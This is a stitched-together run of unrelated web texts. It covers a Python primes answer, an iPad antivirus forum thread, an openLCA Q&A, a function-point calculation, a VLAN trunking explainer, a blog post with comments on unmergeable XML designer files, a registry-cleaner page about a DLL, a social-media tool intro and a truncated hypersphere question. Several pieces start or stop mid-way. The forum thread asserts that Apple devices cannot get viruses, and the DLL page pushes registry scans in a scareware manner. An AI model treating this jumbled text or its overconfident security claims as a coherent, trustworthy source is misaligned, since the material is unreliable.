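    sieve = bytearray([1]) * limit            # sieve[i] == 1 means "i may be prime"
    sieve[0:2] = b"\x00\x00"                  # 0 and 1 are not prime
    for i in range(2, int(limit ** 0.5) + 1):
        if sieve[i]:                          # i is prime: cross out its multiples
            sieve[i * i :: i] = bytearray(len(range(i * i, limit, i)))
    return {i for i, flag in enumerate(sieve) if flag}

primes = primes_below(1000000)                # every prime with at most 6 digits
```

With this set, the primality test becomes a membership check (n in primes), and each tens group can then be tested with a plain set intersection.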
Then the check would look like:
all(
    any(not (tens & primes) for tens in tens_groups.values())
    for tens_groups in hundreds.values()
)
Use of all and any, as @machine yearning suggests, is generally advised, not only because they are readable, but also performance-wise, because they short-circuit. Well, you do something similar with your breaks, but that does not look expressive enough and does not cover all cases.
However, if you'd like to also have a counterexample (if there is one), then all won't work. You can use some simple iteration and raise a custom exception when you've found a result (questionable, but it will free you from cluttering your code with lots of checks), but that will only work if you need one counterexample.
I'd say we can split core of the logic and all the iteration by extracting logic to is_counterexample function, like that:
def is_counterexample(hundreds):
return all(tens & primes for tens in hundreds.values())
Then you generate all your hundreds and do either of 3 options:
• any if you need to check for counterexample
• filter if you need to get all counterexamples
• filter and use next on that to get 1 counterexample
• itertools.filterfalse (docs) to get all numbers that are not counterexamples.
The output will be a list of numbers that satisfy the property
Your code assumes you need #2, the accepted answer does #1, and in a math context you'd probably get by with #3.
Edit: based on comment "...The output will be a list of numbers that satisfy the property...", added an option that implements that.
• This answer provides a remarkable complement. The previous one explained to me the basics of itertools though, that I didn't know about, and put me on the right path; that's why I accepted it. Thank you for these pieces of additional information and that new point of view! – BusyAnt, Jul 11 '16 at 15:26
• Regarding the "basics of itertools": make sure you are familiar with generators, especially with the yield from construct. Generating data only as you need it is indeed a powerful tool, but casting to eager data structures without necessity wastes some of that power. (Jul 11 '16 at 15:41)
• @Daerdemandt: Nice stuff here. Really good point about needless casting. I'll edit my answer just to include a way of grabbing a counterexample. (Jul 11 '16 at 20:48)
IPAD downloads, virus etc...?
Discussion in 'iPad 2 Forum' started by GapsterLeFayt, Dec 28, 2011.
1. GapsterLeFayt
GapsterLeFayt iPF Novice
According to the sales guy, all the apps come via Apple and iTunes, so there shouldn't be any need for virus software... I'm not convinced by this.
i.e., how does it work when installing Skype for iPad directly to your iPad?
2. freebirdforever
freebirdforever iPad Ninja
You do not need antivirus software.
Sent from my DROID2 GLOBAL using Tapatalk
3. freebirdforever
freebirdforever iPad Ninja
All of the apps in the App Store are thoroughly checked by Apple before being approved to go in the store. There is no way an app with a virus could get into the App Store. It's one of the beauties of Apple's "closed" system.
4. thewitt
thewitt iPad Ninja
If you jailbreak, you have the ability to load apps outside the Apple App Store, and as such are vulnerable to malware on your iPad. The only known iOS infections have been on jail broken devices.
5. elau
elau iPF Novice
What about while surfing the web? Can you get virus that way?
6. jsh1120
jsh1120 iPad Addict
That explanation wouldn't convince me, either. But apart from the fact that Apple curates the applications offered in iTunes, there's a more fundamental reason that the iPad is not (as) susceptible to viruses and malware as other platforms. You may hear people talk about the iPad's "walled garden" or "closed" design for applications. What this means is that an app and all the data it uses are segregated from the rest of the operating system. Therefore, it is simply not possible for an app to contain code that "escapes" from the application and impacts other apps or the operating system.
This is a very good design if your highest priority is eliminating virus and malware threats but it does have downsides. For example, there is no "common" file system accessible from multiple applications. That means that if you have a single document, only one application can modify that document. Another app has to work with its own copy of the document. Thus, it is sometimes problematic to use multiple applications accessing the same data. You will see this most obviously if you have a photo or a PDF and want to use different apps with that data. Changes by one app will not be reflected by the other unless you export the document and then re-import it to another app.
So the bottom line is that you don't have to rely just on the fact that Apple imposes rigorous tests on apps available in the App Store. The software architecture of iOS provides its own barrier to malware. Of course, it's possible to circumvent these protections to some extent by jailbreaking an iOS device. And that is one reason Apple tries so diligently to prevent jailbreaking. But even then, the underlying architecture of iOS is a pretty good defense.
P.S. In response to another question above, the same logic applies to picking up a virus via a browser. Any malware you might download from a browser cannot "escape" to affect the operating system.
7. thewitt
thewitt iPad Ninja
There has only been one browser based exploit discovered, and that was through a PDF file. It was patched before any damage was done.
8. Blackbelt
Blackbelt iPad Enthusiast
iOS or OS X devices DO NOT need antivirus. In other words: PCs get viruses, Apple does not.
9. wydelode
wydelode iPF Noob
Yet.
Hi,
I am using openLCA v1.9. After creating a product system and running the calculation, the results tabs do not show any process results, contribution tree, etc. Does anybody know the reason?
thanks
1 Answer
Best answer
Dear Zoli,
when you do the calculation, choose "Analysis" instead of "Quick results"; that should give you the missing tabs.
Dear Tim,
Thank you so much, it's true.
Functional Points Calculation 1
Given the following values, compute F.P when all complexity adjustment factors and weighting factors are average.
• User I/P = 50
• User O/P = 40
• User Inquires = 35
• User Files = 6
• External Interfaces = 4
Functional Unit                   Weighting Factors
                                  Low   Average   High
External Inputs (EI)               3       4        6
External Outputs (EO)              4       5        7
External Inquiries (EQ)            3       4        6
Internal Logical Files (ILF)       7      10       15
External Interface Files (EIF)     5       7       10
Solution:
Here, we are given functional units as:
• User I/P = 50
• User O/P = 40
• User Inquires = 35
• User Files = 6
• External Interfaces = 4
Also we are given,
Complexity Adjustment Factors are average.
0 - No Influences
1 - Incidental
2 - Moderate
3 - Average
4 - Significant
5 - Essential
And Weighting Factors are also average.
AVERAGE complexity weights = {4, 5, 4, 10, 7} for the 5 complexities respectively.
Now,
We know that:
Final F.P = UFP × CAF
where UFP (Unadjusted Function Points) is:
UFP = Σ (count of each functional unit × its weighting factor)
and CAF (Complexity Adjustment Factor) is:
CAF = 0.65 + 0.01 × ΣFi, where Fi are the 14 complexity adjustment factors, each rated 0 to 5
UFP = 50 x 4 + 40 x 5 + 35 x 4 + 6 x 10 + 4 x 7
UFP = 200 + 200 + 140 + 60 + 28
UFP = 628
CAF = 0.65 + 0.01 (14 x 3)
CAF = 1.07
F.P = UFP x CAF
F.P = 628 x 1.07
F.P = 671.96
Therefore Function Points = 671.96
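The same computation as a short script (variable names are mine; the counts come from the problem statement and the weights from the "average" column of the table):

```python
# Function Point computation with all weighting factors at "average"
counts  = {"EI": 50, "EO": 40, "EQ": 35, "ILF": 6, "EIF": 4}    # functional units
weights = {"EI": 4,  "EO": 5,  "EQ": 4,  "ILF": 10, "EIF": 7}   # "average" weights

ufp = sum(counts[k] * weights[k] for k in counts)   # Unadjusted Function Points: 628
caf = 0.65 + 0.01 * (14 * 3)                        # all 14 factors rated 3 -> 1.07
fp  = ufp * caf

print("UFP =", ufp)        # UFP = 628
print("F.P = %.2f" % fp)   # F.P = 671.96
```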
Also study another type of Software Estimation: COCOMO MODEL
Understanding VTP (VLAN Trunking Protocol)
According to Cisco Systems Inc., a trunk is a point-to-point link between one or more Ethernet switch interfaces and another device, such as a router or a switch. An Ethernet trunk can carry the data traffic of multiple VLANs over just one link. A VLAN trunk allows data exchange across the entire network. This trunking method uses the IEEE 802.1Q protocol to communicate over Fast Ethernet and Gigabit Ethernet interfaces. When several VLANs are used on a network with multiple interconnected switches, those switches must apply VLAN trunking on the segments that connect one switch to another. A trunk is the link between interconnected switches in a VLAN. Put simply, a trunk can be illustrated by the following figure.
Read also: VLAN (Virtual Local Area Network) Types in Computer Networks
When several VLANs are used on a network with multiple interconnected switches, those switches must apply VLAN trunking on the segments connecting one switch to another. A trunk does not belong to any one VLAN; instead, a trunk is categorized as an inter-VLAN link between switches and routers. The switching tables at both ends of the trunk can be used to make forwarding decisions based on the destination MAC address of the frame.
As the number of VLANs crossing the trunk link grows, forwarding decisions become slower and more difficult, because larger switching tables take longer to process.
Trunking protocols were developed to manage the movement of frames from different VLANs over a single physical link effectively. There are two types of trunking mechanism: frame filtering and frame tagging.
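As a concrete illustration of frame tagging, configuring an 802.1Q trunk on a Cisco switch typically looks like the sketch below; the interface name and VLAN IDs are placeholders, and the encapsulation command only exists on switch models that also support ISL:

```
Switch(config)# interface FastEthernet0/1
Switch(config-if)# switchport trunk encapsulation dot1q
Switch(config-if)# switchport mode trunk
Switch(config-if)# switchport trunk allowed vlan 10,20,30
```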
Ayende @ Rahien
My name is Oren Eini
Founder of Hibernating Rhinos LTD and RavenDB.
Source control is not a feature you can postpone to vNext
I was taking part in a session in the MVP Summit today, and I came out of it absolutely shocked and bitterly disappointed with the product that was under discussion. I am not sure if I can talk about that or not, so we will skip the name and the purpose. I have several issues with the product itself and its vision, but that is beside the point that I am trying to make now.
What really bothered me is utter ignorance of a critical requirement from Microsoft, who is supposed to know what they are doing with software development. That requirement is source control.
• Source control is not a feature
• Source control is a mandatory requirement
The main issue is that the product uses XML files as its serialization format. Those files are not meant for human consumption, but should be used only through a tool. The major problem here is that no one took source control into consideration when designing those XML files, so they are unmergable.
Let me give you a simple scenario:
• Developer A makes a change using the tool, let us say that he is modifying an attribute on an object.
• Developer B makes a change using the tool, let us say that he is modifying a different attribute on a different object.
The result?
Whoever tries to commit last will get an error, the file was already updated by another guy. Usually in such situations you simply merge the two versions together, and don't worry about this.
The problem is that this XML file is implemented in such a way that each time you save it, a whole bunch of stuff gets moved around, all sorts of unrelated things change, etc. In short, even a very minor change causes a significant change in the underlying XML.
You can see this in products that are shipping today, like SSIS, WF, DSL Toolkit, etc.
The problem is that when you try to merge, you have too many unrelated changes, which completely defeat the purpose of merging.
This, in turn, means that you lose the ability to work in a team environment. This product is supposed to be aimed at big companies. But it can't support a team of more than one! To make things worse, when I brought up this issue, the answer was something along the lines of: "Yes, we know about this issue, but you can avoid this using exclusive checkouts."
At that point, I am not really sure what to say. Merges happen not just when two developers modify the same file; merges also happen when you have branches. As a simple scenario, I have a development branch and a production branch. Fixing a bug in the production branch requires touching this XML file. But if I made any change to it on the development branch, you can't merge that. What happens if I use a feature branch? Or version branches?
Not considering the implications of something as basic as source control is amateurish in the extreme. Repeating the same mistake, over and over again, across multiple products, despite customer feedback on how awful this is and how much it hurts the developers who are going to use it, shows contempt for the end developers, and is a sign of an even more serious issue: the team isn't dogfooding the product. Not in any real capacity. Otherwise, they would have already noticed the issue, much sooner in the lifetime of the product, with enough time to actually fix that.
As it was, I was told that there is nothing to do for the v1 release, that puts the fix (at best) in two years or so. For something that is a complete deal breaker for any serious development.
I have run into issues where merge issues with SSIS caused us to have to drop days of work and having to recreating everything from scratch, costing us something in the order of two weeks. I know of people that had the same issue with WF, and from my experiments, the DSL toolkit has had the exact same issue. The SSIS issues were initially reported on 2005, but are not going to be fixed for the 2008 (or so I heard from public sources) , which puts the nearest fix for something as basic as getting source control right in a 2-3 years time.
The same for the product that I am talking about here. I am not really getting that, does Microsoft things that source control isn't an important issue? They keep repeating this critically serious mistake!
For me, this is unprofessional behavior of the first degree.
Deal breaker, buh-bye.
Comments
Tom Isaacson
We have the same problem with another Microsoft product - Visual Studio 2005. The contents of the .vcproj files used to store project details get moved around randomly every time a change is made. It makes merging changes automatically impossible.
Frans Bouma
Is the entity framework designer that bad? ;)
Btw, nhibernate xml mapping files (where everything is in 1 mapping file) have the same issue IMHO.
It's related to a file where references are stored between elements in that same file. You can only solve that by using some sort of text-based DSL, as source control merge algorithms are good at merging these.
The thing with XML is that it's easier to write a parser for the XML format (as you can get away with serializers) than to write a DSL.
pete w
I would love to hear a little more context on this subject but I suppose that when the product you are talking about hits the market, it will probably be rather obvious :)
Chris Ortman
@Tom: Ouch, I didn't know that about vcproj files. Is 2008 any better?
El Guapo
Linq to SQL does not seem to have this problem so it must be entity framework.
Frans: Why are you storing everything in 1 mapping file? We use 1 file per entity. Also, I don't see how NH mapping files have this problem. They are edited by hand and don't randomly change and move stuff.
Will
Is this an MS problem, a VSTS problem, an X problem (where X is a program whose output is in xml format and is under source control) or is it the nature of the XML beast?
Which is it?
Clearly XML doesn't force you to place tags in a specific order. So, wouldn't this be an issue with any product on any platform with any source control?
Frans Bouma
@el Guapo: 1 mapping file could be a choice for people with hundreds of entities perhaps. Otherwise you'll have xml files all over the place.
That they're edited by hand is no excuse. 300 entity definitions which have references to each other all over the place make it hard to version it; especially with larger sets it means that changes can be bigger and happen more often than when a simple name change is performed.
Alex Simkin
Oh, I know what you are talking about...
If configuration were coded in Boo, it would be much easier to merge files.
Right?
Glyn
I would guess the product is called Biztalk.
The problem is not that it's an xml file, it's the fact that when you change something the xml file structure gets reformatted, hence the conflict.
Alex Simkin
I would guess that product is whatever with VISUAL DESIGNER.
It is almost impossible to show the delta or facilitate a merge visually, and if you look under the hood, nothing is human readable.
Chad Myers
Ayende, I wrote a post kinda like this, about the minimum requirements for producing good software. I think it's even more than JUST source control.
To avoid being accused of link-whoring, I'll post the URL through tinyurl:
http://tinyurl.com/6bclpl
I think source control, continuous integration, etc all come back to 'repeatability'. If your software can't be found, built, and tested repeatably by someone on a PC other than yours, that's very bad!
Driesie
The nHibernate mapping file argument doesn't hold up. Xml is (or should be) easy to merge using an XML diff tool. The point that is being made, which I would imagine is exactly the same problem as with SSIS today, is that the tool doesn't just "change" an attribute. It just serialises a load of "stuff" into an xml file that isn't structured very well, so there's no way a diff tool can do a good job. I can't see why you would ever completely re-order and re-structure an nHibernate mapping file and then try to merge it. Usually you will change a value, add a node, remove a node ... all sorts of things that are easy to merge.
A second problem with the SSIS file format is that it isn't just XML, it's actually serialised XML within an xml file. No way you can merge that correctly. So Alex, I don't think the argument that if it was Boo it would be better is a good one either. If it was Boo, and the software would re-organise the structure and add loads of meta data in random places each time you hit save, then you would end up with the same problem!
Nothing wrong with using an XML file as a source in itself (in terms of source control, I don't want to get into the XML vs programming argument), but keeping source control in mind when implementing it is crucial.
So, I agree 100%, you can't design a development tool and not think of these issues and still expect to be taken seriously. It's a deal breaker for me too.
The Other Steve
Merge engines in source control generally look for contextual changes in text files. While XML is text, it really is more of a structured data format.
How hard would it be to write something that looked at two XML data structures and noted differences? It'd be like comparing tables in a database. Difficult, but not impossible.
Oran
Brian Harry strikes again. Checkout-Edit-Checkin is a far worse model than Edit-Merge-Commit, and you can't just shoehorn Edit-Merge-Commit on top of Checkout-Edit-Checkin in V2 and call it good, which is exactly the decision Brian made. They should not have put the VSS guy in charge of TFS source control, but they did. Of course they were already used to Source Depot (modified Perforce), so they didn't know any better regarding Edit-Merge-Commit, but still, the fact that they chose to forego source control entirely (WOW!) rather than use the model they knew (and hated) is a glaringly obvious sign that Checkout-Edit-Checkin is too heavyweight.
Eric
@ Oran: I don't think the Edit-Merge-Commit model would fix the problem that Ayende is ranting about. You still may have to merge two wildly different versions together at some point. Imagine that you have a team of developers working together in an Edit-Merge-Commit source control tool, but every time any one of them makes any kind of change, they randomly reorder all of the functions in the file. Somebody is going to feel some merge pain.
Pat Gannon
I agree that this sort of 'semi-structured' XML (for lack of a better term) has the potential to cause a TON of friction. I experienced this at my last job with SSAS (analysis services). I made a few changes to the cube to get my MDX queries to work, while my boss was making major cube changes to get something else to work simultaneously (unbeknownst to me). We discussed it over the phone and decided there shouldn't be a problem since our changes didn't overlap. (I changed completely separate dimensions/measures than he did.) Accordingly he checked in his changes, and then I tried to check in mine, expecting Subversion to be able to merge the two. Unfortunately, I got that desperate sounding "merge conflict" sound from TortoiseSVN and then was horrified to discover that there were a bazillion strange little differences between my boss' version of the cube (SSAS-specific XML) and mine, because of this exact type of random XML re-ordering that you're describing. I then proceeded to spend a half day re-implementing my changes on top of his, rather than try to merge the two together. The horror! What were they thinking?
Miki Watts
That is the exact reason I've stopped trusting and using .resx files. I'm developing my own layout file, where at least there it won't shuffle the file all over the place, making me lose entire days of work during the merge.
Mr_Simple
It ain't just Microsoft, throw corporate America, Google, Sun, and open source in there too.
The programmers at these outfits aren't any better or worse than anyone else - we just wish they would be better.
Bottom line, protect yourself with comments, asserts, logs, and source control. To heck with the other guy because no doubt you'll be straightening out his mess, but he won't be working on your mess because there is no mess.
Ayende Rahien
Darius,
No, it is not a source control system. It is a product that cannot be used in source control.
Tom,
There is a LOT of stuff from MS that does that. This is broken, period.
Frans,
NH mapping files are not randomly shuffled each time you edit them. If you edit something, it is a local modification.
If you edit something using MS approach, 70% of the file have changed.
This is not an issue with XML, it is an issue with the way they are using XML.
El,
About Linq to SQL, no, it doesn't have this issue.
Will,
This is a problem in a lot of MS products. It is specifically an issue with a product that I saw that saved its files in such a way that it makes source control useless.
Frans,
In NH, you don't need to reference other entities in a way that is broken on each change.
If you make a modification, it is local and mergable.
I was working with a domain that had > 10,000 entities across ~700 databases, no issues.
Alex,
See the rest of the stories in the comments for clarifications. There is zero reason this can't work, it is just made broken.
Specifically, Driesie does a good job describing the problem.
Glyn,
Yes, that is the problem I am talking about.
Alex,
Yes, it has a designer.
Chad,
The first step, get your source control story right. This is about as basic as it can get.
After that, we can talk.
The other steve,
There is no issue with XML itself, but the way they save stuff is by randomly moving things around. A simple change affects the entire file.
Can't code review that, can't merge that, can't branch that, broken.
Oran & Eric,
Actually, checkout / edit / commit was the proposed "solution" to this issue.
It doesn't work, because branches are actually useful.
Oran
Exactly, exclusive checkouts are not the right solution to their lack of foresight, but it's unfortunately the default solution most Microsofties will think of because that's the style of source control everyone uses there. Even if they dogfooded it, they would dogfood it with exclusive-checkout blinders on. :-(
Alex Simkin
@Ayende
"Alex, Yes, it has a designer."
Oh, perfect... Now answer the following question:
You have created a class diagram and checked it in. Two other developers checked out diagram and moved boxes around (doesn't affect code generation, so nothing changed but designer file). Now they are checking in their files and asked to merge their changes...
Assuming that they completely understand file layout and it is not mixed up (sorted alphabetically :P ). How do they do it if one wants base class on the left and the other wants base class on the right (and I prefer them on top)?
lmchen
Kind of a chicken-and-egg question.
If a language is designed to not be source-control friendly,
I don't understand why this is the source control system's fault.
I don't think source control is any friendlier to LISP or PROLOG or T-SQL language files.
Source control is especially nice to procedural languages like C, BASIC, PASCAL. (That's why CVS, Perforce, etc. are all line-based diff -- they are easier to implement.)
I think I'm missing something here -- are you claiming that XML is also a procedural language, so source control systems must do the "same" job as they do for C, C++, BASIC, Pascal?
Jake Scott
The problem is the designers use xaml: if you move an object on your diagram, the xaml is changed dramatically. Therefore when two developers try to merge their changes (e.g. with the LINQ to SQL designer) you have merge hell.
I choose on my latest project just to use sqlmetal.exe instead of the horrible designer.
Ayende Rahien
Alex,
That issue is a classic conflict, you have to decide what to do.
And that scenario, FYI, completely breaks in that product.
Jan Limpens
Alex: probably the ordering of boxes in the designer (which has no implication for the generated classes) should be persisted as a per-user preference and not versioned.
Even if it was
<property type="string" name="id"/>
this should be easy to version. The problem arises with carelessly created xml (usually xml serialized objects) that has no special order and random formats. If changing y="250" to y="251" leads to lots of linebreaks, reordered class elements, this can become unmergable.
Alex Simkin
@Jan
"should be persisted as a per-user preference"
Then solve this chicken/egg problem:
When you change the class diagram, the designer changes the generated classes; when you change the generated classes, the designer updates the diagram. All nice and peachy when you are on your own in Visual Studio. Now you have checked out the designer file and the generated classes from the SCM. How do you validate the checkout? Do you update the diagram or the classes?
Jan Limpens
@ Alex
I fail to see the problem, because the only part that could be out of sync is visual meta data (because that is what is not versioned). So new objects would be placed on some default locations defined by the program or removed if deleted.
Classes and diagrams should be in sync due to the diagramming tool (as you suggest). If not, it is the task of the designer to update itself from the concrete classes (the other way would be automatic, wouldn't it?).
Maybe I am missing something here...
Jim
Why do you still use .NET or Microsoft specific technologies then? Based on the Java SDK code that I've read, Sun and Java developers are far more competent.
Alex Simkin
@Jan
"So new objects would be placed on some default locations"
How do you know that new objects should be placed on the diagram in the first place? By having one diagram for all objects in the system?
"Classes and diagrams should be in sync..." Exactly. So, if an object is not on the diagram, should it be added to the diagram or deleted (because it was deleted from the diagram)? I use "diagram" as an example; you can imagine some UI designer that cannot be considered a secondary tool -- it is the primary tool to create something, but with limitations that force you to resort to code editing. (This is real life.)
AWolf
Oh crap.......Not Oslo......Dam....Crap
Whatever.
naraga
well, this always happens if you choose the "wizard" way of working. but i'm not sure a world without wizards would be a better place to live.
what can we do now? use intelligent XML merge tools if formatting and ordering are the only problems.
what can tool vendors do? split files into multiple parts (fundamental content, layout stuff, other unimportant fluff) so we can merge only the fundamental part.
and yes i must confirm that most companies work in checkout-edit-checkin mode...
flukus
Even if you use the checkout-edit-checkin scenario, what if a bug comes up? If a minor change caused the issue, how do you find that minor change when 70% of the file has changed?
Makes me wonder what a diff would look like between a Word-generated OOXML file and an OpenOffice-generated ODF file....
Frans Bouma
@Oren: every o/r mapping file has elements which refer to other elements by name. there can be a situation (e.g. with complex inheritance scenarios) where person A removes or changes elements in such a way that his file is still correct but when merged with another file which is also a changed version of the SAME parent, you'll get merge conflicts.
That's where the gripe is all about I think: a diff tool can only go so far before it has to give up because it has to decide between two (or more) options and the user now has to fix it manually. With reshuffled XML this is hard to do. You don't sell me the story that making two copies from the same nhibernate mapping file, changing things at different places in these 2 files will never result in a merge conflict. That's not something bad about nhibernate, I just used that as an example. We use a binary file, which is also a pain in scc. (we therefore will move to a text dsl soon)
I think the main point is: HOW should XML be merged in an SCC system? I think Driessie gave a good hint: with an XML diff tool. So, an SCC shouldn't treat XML files as text but as XML data, and should use the appropriate diff tool to merge them. After all, using an XML diff tool, merging XML is easy; with a text-diff tool it can be a pain.
This goes further: merge conflicts aren't solvable in a text editor when the text is XML. Sure, simple name changes are, but if the XML differs a lot, especially when elements refer to other elements (a relation between entities based on a field which doesn't happen to be there in the merged data -> the relation has to go as well, but because that relation goes, the inheritance hierarchy has to go...), merge conflicts are only solvable with a tool which is made especially for XML merge conflicts, as it understands that the text at hand is XML, i.e. structured data, not random ASCII.
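The idea of treating XML as structured data rather than text can be sketched in a few lines. This is only an illustration, not a merge tool: it parses both documents and compares tag, attributes, text and children, so attribute order and intra-tag whitespace -- which defeat a line-based diff -- no longer register as differences.

```python
import xml.etree.ElementTree as ET

def as_data(elem):
    """Reduce an element to a comparable value: tag, sorted attributes,
    stripped text, and the same reduction of each child, in order."""
    return (
        elem.tag,
        tuple(sorted(elem.attrib.items())),
        (elem.text or "").strip(),
        tuple(as_data(child) for child in elem),
    )

a = ET.fromstring('<class name="User"><property type="string" name="id"/></class>')
b = ET.fromstring('<class  name="User">\n  <property name="id" type="string" />\n</class>')

# As text these differ on every line; as data they are identical.
print(as_data(a) == as_data(b))  # True
```

A real XML diff/merge tool would also have to match moved elements and understand references between them, which is where the hard part starts.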
Tom Isaacson
@Chris: I don't know - haven't installed it yet but I have the DVD ready for a rainy day. It's possible this doesn't affect PC developers but we're doing builds for multiple WinCE devices (using different SDKs) and it's a major pain. I also found a bug which corrupts the .vcproj file when you edit the preprocessor settings but Microsoft can't recreate it - odd how it happens to me on a daily basis!
Joshua McKinney
The easy way to look at this problem is that there is an impedance mismatch between the visual designer, the XML representation of the visual design, and the text-file view that a source control system has of the XML. You can either put some smarts in the visual -> XML layer that preserves ordering within what is nominally non-order-specific data, or put some smarts in the XML -> source control layer. Both have their weaknesses. The contract for a visual designer's persistence is that it can correctly save and reload changes, not generally that it needs to preserve whatever changes have occurred external to the designer. Adding a merge-friendly contract to the persistence routines for a visual designer isn't a particularly easy thing to achieve (in my mind at least, and this is backed up by anecdotal evidence of SSIS, SSAS, ...). Using a flat file to represent structured data is the first impedance mismatch that needs to be addressed. Perhaps there is a data + delta format that would make more sense here?
Smarts in the source control is another way to handle this. Let's say in some source code, I make a change to a line in a method (for instance I correct an off-by-1 bug) and check in v2. Next I move that method before the previous method in the file and check in v3. Diffing v1 to v3 doesn't give me a real indication of the v1 to v2 change, as the v2 to v3 changes are more obvious and noticeable in the diff. Smarts in the source control's interpretation of the 'source' that is being stored would allow that kind of situation to be more opaque. Do any source control systems do this at present?
knocte
It happens the same with VisualStudio .sln files :(
These people seem to be working with VSSourceSafe+exclusive checkouts, damn...
Ayende Rahien
Frans,
I am fine with XML files and merging them. And I am not saying that you'll never have merge conflicts.
The issue is what type of merge conflicts.
If changing a single property results in 70% of the file being changed, that is not mergable.
If changing a single property results in a single line being changed, that is mergable.
C# Programmer
Ayende - do you have any ideas about the XML file merging problem?
Generate all XML files from plain text with NAnt, and keep only that plain text in SVN instead of the XML?
Or write a mega-super 2-way processor: XML -> plain text -> merge the plain texts from the "our" and "their" versions -> convert the merge back to XML?
How do you work with .csproj and .sln files, which are XML, during merging?
And thank you for that post; I'll never use XAML, for the XML merging reason alone
Stuki Moi
A fundamental problem is that the way these designers measure the size of a change is largely unrelated to the way a text-, or even raw XML-, based tool would measure it. If I save a 'design', reload it, make a small change, and save it again, in the 'mind' of the designer these files are very similar, even if they look very different to a stream-based differ.
Could shipping each of these tools with an attendant context-aware differ, and rewriting the source control tools to use a pluggable one for each designer's chosen XML format, make some sense? I haven't fully thought this through, but it would seem this might be easier than forcing every designer to serialize in a way pleasing to existing source control systems. And I really, really don't want to have to give up the use of designers. They are way too beneficial for that.
naraga
in a way XML helped a lot (even though version control tools cannot catch up) because the only remaining "comfortable" option for most vendors would be custom binary formats.
Joshua McKinney
Another way again of looking at this is that the XML really stores two kinds of relevant information: data, in the form of elements, attribs etc., and presentation, in the form of whitespace and the ordering of elements, attributes etc. It is the presentation that is by XML's very definition open to interpretation. Given a particular schema and a particular set of data, it is possible to find infinite ways to present that data in XML. Source control could take advantage of this to store a normative version of the data (e.g. all non-relevant whitespace stripped, attribs ordered by name alphabetically, elements similarly ordered when appropriate). Attached to this would be some form of transform (XSLT perhaps?) which would get us to the presentation that was last saved by the designer. This would be good for diffs between versions, and could be extensible enough to even solve code style arguments (K&R vs Allman)
C# Programmer
I can't agree that XML helped a lot just because the only remaining format is binary.
Ruby on Rails has the YAML format, which is really simple and mergeable.
Even old [ini] format like
[section]
property=value
...
is even more source-control friendly
naraga
C# Programmer,
in what way is YAML more mergeable than XML? if it's used for object graph serialization it really doesn't matter whether you enclose strings in quotation marks or not.
INI is useless for anything more than simple app configuration. it cannot be used for complex data structures.
Joshua McKinney,
i agree. XML is more about data than about formatting. i really like your idea about employing additional formatting to support current text-based diff tools for XML data. xslt is a nice way to achieve that. just take the example of XML Schema: in an XML file with schema content, formatting is even less important. the ordering of type elements is ignored by the xml validator but very important for a text diff. so what if we sort all types in a file in alphabetical order?
Joseph Cooney
Would running an xml canonicalization transform over the xml file prior to check-in be a way to work around this issue? Naturally it will depend on the nature of the change (if it is element/attribute re-ordering then canonicalization will work). Either way it's unfortunate to be having to think about work arounds like this for something that is not out of the door yet.
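As a rough sketch of the canonicalization idea, Python's standard library (3.8+) ships a C14N 2.0 serializer. Note it normalizes attribute order and tag-internal whitespace but does not reorder elements, so it only addresses part of the reshuffling problem described in this thread:

```python
import xml.etree.ElementTree as ET

# Two serializations of the same element: attribute order and the
# whitespace inside the tag differ, so a line-based diff flags them.
a = '<property type="string" name="id"/>'
b = '<property   name="id" type="string" />'

# C14N sorts attributes and normalizes the serialization, so both
# inputs canonicalize to the same byte-for-byte string.
# (strip_text=True would additionally drop whitespace-only text nodes.)
print(ET.canonicalize(a))
assert ET.canonicalize(a) == ET.canonicalize(b)
```

Running such a pass as a pre-commit step would at least make superficial re-serializations invisible to a text diff.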
Jason
Can it be that we see an XML file as a text file and therefore want it to behave like one, while it in fact is an XML file and should be treated differently? In XML the content hasn't changed if you put two spaces between two attributes instead of one, but as a text file it has. This could be seen as more of a problem with the tool performing the diff than a lack of "strictness" in the XML editor in use (note the "could" here ;) ). My point is that it's very easy to claim that a plain text file readable to us humans should be processed as a plain text file, period. But maybe we should rather use tools to tell us if the content has really changed?
BTW: I already see the comments come flying :)
vefxtsfm.dll
Process name: EffectTransform Module
Application using this process: EffectTransform Module
Recommended: Check your system for invalid registry entries.
What is vefxtsfm.dll doing on my computer?
EffectTransform Module This process is still being reviewed. If you have some information about it feel free to send us an email at pl[at]uniblue[dot]com
Non-system processes like vefxtsfm.dll originate from software you installed on your system. Since most applications store data in your system's registry, it is likely that over time your registry suffers fragmentation and accumulates invalid entries which can affect your PC's performance. It is recommended that you check your registry to identify slowdown issues.
vefxtsfm.dll
In order to ensure your files and data are not lost, be sure to back up your files online. Using a cloud backup service will allow you to safely secure all your digital files. This will also enable you to access any of your files, at any time, on any device.
Is vefxtsfm.dll harmful?
vefxtsfm.dll has not been assigned a security rating yet.
vefxtsfm.dll is unrated
Can I stop or remove vefxtsfm.dll?
Most non-system processes that are running can be stopped because they are not involved in running your operating system. Scan your system now to identify unused processes that are using up valuable resources. vefxtsfm.dll is used by 'EffectTransform Module'. This is an application created by 'Unknown'. To stop vefxtsfm.dll permanently, uninstall 'EffectTransform Module' from your system. Uninstalling applications can leave invalid registry entries that accumulate over time.
Is vefxtsfm.dll CPU intensive?
This process is not considered CPU intensive. However, running too many processes on your system may affect your PC’s performance. To reduce system overload, you can use the Microsoft System Configuration Utility to manually find and disable processes that launch upon start-up.
Why is vefxtsfm.dll giving me errors?
Process related issues are usually related to problems encountered by the application that runs it. A safe way to stop these errors is to uninstall the application and run a system scan to automatically identify any PC issues.
Introduction
Conflux is a platform to sync, manage and automate all your social accounts, advertising campaigns and news feeds in one place. It is built with the primary objective of saving your time by automating repetitive tasks with a smart and powerful software application.
What can I use ConfluxBot for?#
Syncing and Filtering content for you and for your audience
Conflux streamlines the process of collecting content from various different resources, organising them, filtering the relevant content, making appropriate modifications and finally publishing the polished content to your audience.
Consider the following example scenario:#
You have ten different channels and you want to track the sales/traffic of each channel separately, but making separate tracking URLs for each channel is a pain, so you have dropped the idea of having separate reports and compromised with a single consolidated report.
This might work when these are all channels you own, but what if you are a social media manager who handles the channels of ten or fifty clients, and you need to post some common info to all channels, each with its own UTM / affiliate tracking? Create the same content 'n' times?
Well, we do not want you to settle for anything less than you deserve, or to repeat a task 'n' times more than you should.
That is why we have made ConfluxBot
Proving that 'volume' and 'surface' of hypersphere go to 0 as n -> infinity?
1. Mar 7, 2012 #1
1. The problem statement, all variables and given/known data
I'm supposed to find the equations of a hypersphere in n-dimensions (meaning the set of points within the radius R), as well as of its surface (the set of points at exactly radius R). I've already found the equations, and now need to show that both go to zero as n goes to infinity.
2. Relevant equations
